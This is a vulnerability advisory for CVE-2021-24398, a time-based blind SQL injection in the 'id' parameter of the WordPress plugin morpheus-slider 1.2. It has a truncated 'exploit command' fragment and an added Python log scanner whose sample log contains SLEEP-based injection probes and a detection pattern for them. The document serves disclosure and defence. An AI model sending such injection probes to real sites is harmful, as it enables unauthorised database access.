Key Vulnerability Information

Vulnerability Overview

- Plugin Name: wp-plugin: morpheus-slider
- Affected Version: 1.2 (and most likely lower versions if any)
- Vulnerability Type: Injection
- Minimum Access Level: Administrator
- CVE Number: CVE-2021-24398
- Identified by: Syed Sheeraz Ali

Timeline

- May 9, 2021: Issue Identified and Disclosed to WPScan
- May 13, 2021: Plugin Closed
- June 10, 2021: CVE Assigned
- August 22, 2021: Public Disclosure

Technical Details

- Vulnerable File: /init.php#983
- Vulnerable Code:
- PoC Screenshots
- Vulnerability: The parameter 'id' is vulnerable to time-based blind SQL injection.
- Detected with Sqlmap: Sqlmap identified an injection point with 336 HTTP requests.

Exploit

Exploit Command:

```bash
slider&width1=1200&height1=600&border1=10000&op41=1000&color31=4&op11=-1&op12=-1&op13=-1&op14=-1&font1=
```
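Because the plugin was closed rather than patched, reviewing web server logs for abuse of the `id` parameter is a practical check. The following is an added example, not code from the advisory or the plugin. It assumes that `id` appears in the query string of `/wp-admin/` requests and that logs use the combined format; the page value `example-slider`, the addresses and the log lines are constructed placeholders.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (combined format). Addresses, timestamps and the
# "example-slider" page value are placeholders, not values from the advisory.
SAMPLE_LOG = '''\
198.51.100.10 - - [01/Sep/2021:10:00:01 +0000] "GET /wp-admin/admin.php?page=example-slider&id=3 HTTP/1.1" 200 5120
198.51.100.10 - - [01/Sep/2021:10:00:09 +0000] "GET /wp-admin/admin.php?page=example-slider&id=7 HTTP/1.1" 200 5098
203.0.113.7 - - [01/Sep/2021:10:02:11 +0000] "GET /wp-admin/admin.php?page=example-slider&id=3%20AND%20SLEEP(5) HTTP/1.1" 200 5120
203.0.113.7 - - [01/Sep/2021:10:02:17 +0000] "GET /wp-admin/admin.php?page=example-slider&id=3%27 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Sep/2021:10:02:18 +0000] "GET /index.php?id=abc HTTP/1.1" 200 812
'''

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')
INTEGER_RE = re.compile(r"[0-9]+")
# Function names commonly seen in time-delay probes against MySQL/MariaDB.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)


def suspicious_id_requests(log_text, param="id"):
    """Count, per client, wp-admin requests whose `param` is not a plain integer."""
    findings = defaultdict(Counter)
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.startswith("/wp-admin/"):
            continue  # the advisory's injection point needs an administrator session
        # parse_qs percent-decodes values, so encoded payloads are compared in clear form
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if INTEGER_RE.fullmatch(value):
                continue  # a legitimate numeric id
            kind = "time_delay" if DELAY_RE.search(value) else "non_numeric"
            findings[client][kind] += 1
    return {client: dict(counts) for client, counts in findings.items()}


if __name__ == "__main__":
    for client, counts in suspicious_id_requests(SAMPLE_LOG).items():
        print(client, counts)
```

Parameters sent in a POST body do not appear in access logs, so this check only covers query-string use; a high count of non-numeric `id` values from one client is consistent with the automated probing the advisory describes.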